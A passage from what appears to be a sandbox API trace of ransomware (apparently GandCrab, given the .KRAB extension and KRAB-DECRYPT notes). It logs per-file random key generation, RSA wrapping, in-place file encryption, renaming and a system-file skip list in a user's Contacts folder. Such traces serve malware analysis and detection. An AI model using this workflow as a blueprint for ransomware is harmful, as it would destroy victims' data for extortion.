[0085.880] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.880] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".contact ") returned 9 [0085.880] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned 51 [0085.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned 51 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="desktop.ini") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="autorun.inf") returned 1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntuser.dat") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="iconcache.db") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="bootsect.bak") returned 1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="boot.ini") returned 1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntuser.dat.log") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="thumbs.db") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="KRAB-DECRYPT.html") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="KRAB-DECRYPT.txt") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="CRAB-DECRYPT.txt") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntldr") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="NTDETECT.COM") returned -1 [0085.881] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Bootfont.bin") returned 1 [0085.881] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.882] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0085.883] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.884] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.884] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.884] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0085.884] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.884] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.885] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10114e0) returned 1 [0085.886] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.887] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.887] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.887] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0085.887] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0085.887] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.887] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0085.889] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0085.889] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.889] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.889] GetLastError () returned 0x0 [0085.889] CryptDestroyKey (hKey=0x10231f8) returned 1 [0085.889] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.889] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0085.891] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0085.891] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.891] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.892] GetLastError () returned 0x0 [0085.892] CryptDestroyKey (hKey=0x10234f8) returned 1 [0085.892] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.892] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0085.894] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.894] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.894] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x499, lpOverlapped=0x0) returned 1 [0085.917] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffb67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.917] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x499, lpOverlapped=0x0) returned 1 [0085.917] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0085.917] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.921] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.921] CloseHandle (hObject=0x434) returned 1 [0085.922] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.922] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\chucu jadnvk.contact.krab")) returned 1 [0085.923] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.923] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.923] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0085.923] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0085.923] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a08d2ca4dee3d.lock" [0085.923] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.923] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 59 [0085.924] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a08d2ca4dee3d.lock") returned 54 [0085.924] lstrlenW (lpString=".lock") returned 5 [0085.924] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.924] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0085.924] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.924] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.925] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.925] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0085.925] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0085.925] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini" [0085.925] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.925] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini.KRAB") returned 47 [0085.925] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned 42 [0085.925] lstrlenW (lpString=".ini") returned 4 [0085.925] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.926] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0085.926] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.926] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned 42 [0085.926] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\desktop.ini") returned 42 [0085.926] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0085.926] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.927] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.927] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0085.927] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0085.927] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\KRAB-DECRYPT.txt" [0085.927] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.927] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\KRAB-DECRYPT.txt.KRAB") returned 52 [0085.927] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\KRAB-DECRYPT.txt") returned 47 [0085.927] lstrlenW (lpString=".txt") returned 4 [0085.927] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.928] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0085.928] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.928] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\KRAB-DECRYPT.txt") returned 47 [0085.928] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\KRAB-DECRYPT.txt") returned 47 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0085.928] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0085.928] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.929] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.929] lstrcmpW (lpString1="lulcit amkdfe.contact", lpString2=".") returned 1 [0085.929] lstrcmpW (lpString1="lulcit amkdfe.contact", lpString2="..") returned 1 [0085.929] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="lulcit amkdfe.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact" [0085.929] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.929] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact.KRAB") returned 57 [0085.929] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned 52 [0085.929] lstrlenW (lpString=".contact") returned 8 [0085.929] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.930] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".contact ") returned 9 [0085.930] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.930] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned 52 [0085.930] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact") returned 52 [0085.930] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="desktop.ini") returned 1 [0085.930] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="autorun.inf") returned 1 [0085.930] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntuser.dat") returned -1 [0085.930] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="iconcache.db") returned 1 [0085.930] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="bootsect.bak") returned 1 [0085.930] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="boot.ini") returned 1 [0085.931] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntuser.dat.log") returned -1 [0085.931] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="thumbs.db") returned -1 [0085.931] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="KRAB-DECRYPT.html") returned 1 [0085.931] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.931] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.931] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntldr") returned -1 [0085.931] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="NTDETECT.COM") returned -1 [0085.931] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Bootfont.bin") returned 1 [0085.931] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.931] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0085.933] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.933] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.934] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.934] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0085.934] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.934] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.934] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010bd8) returned 1 [0085.935] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.936] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.936] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.936] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0085.936] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0085.936] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.938] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010a40) returned 1 [0085.940] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0085.940] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.940] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.940] GetLastError () returned 0x0 [0085.940] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.940] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0085.940] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0085.942] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0085.942] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.942] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.942] GetLastError () returned 0x0 [0085.942] CryptDestroyKey (hKey=0x10231f8) returned 1 [0085.942] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.942] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0085.943] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.943] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.944] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x496, lpOverlapped=0x0) returned 1 [0085.959] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.959] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x496, lpOverlapped=0x0) returned 1 [0085.960] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0085.960] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.964] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.964] CloseHandle (hObject=0x434) returned 1 [0085.964] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.964] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\lulcit amkdfe.contact.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\lulcit amkdfe.contact.krab")) returned 1 [0085.965] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.965] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.965] lstrcmpW (lpString1="sikvnb huvuib.contact", lpString2=".") returned 1 [0085.965] lstrcmpW (lpString1="sikvnb huvuib.contact", lpString2="..") returned 1 [0085.966] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="sikvnb huvuib.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact" [0085.966] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.966] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact.KRAB") returned 57 [0085.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned 52 [0085.966] lstrlenW (lpString=".contact") returned 8 [0085.966] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.966] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".contact ") returned 9 [0085.966] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.967] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned 52 [0085.967] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact") returned 52 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="desktop.ini") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="autorun.inf") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntuser.dat") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="iconcache.db") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="bootsect.bak") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="boot.ini") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntuser.dat.log") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="thumbs.db") returned -1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="KRAB-DECRYPT.html") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntldr") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="NTDETECT.COM") returned 1 [0085.967] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Bootfont.bin") returned 1 [0085.967] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.968] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010b50) returned 1 [0085.969] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.970] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.970] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.970] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0085.970] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0085.970] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.970] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010ce8) returned 1 [0085.972] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.972] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.972] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.973] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0085.973] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0085.973] VirtualFree (lpAddress=0x3000000, 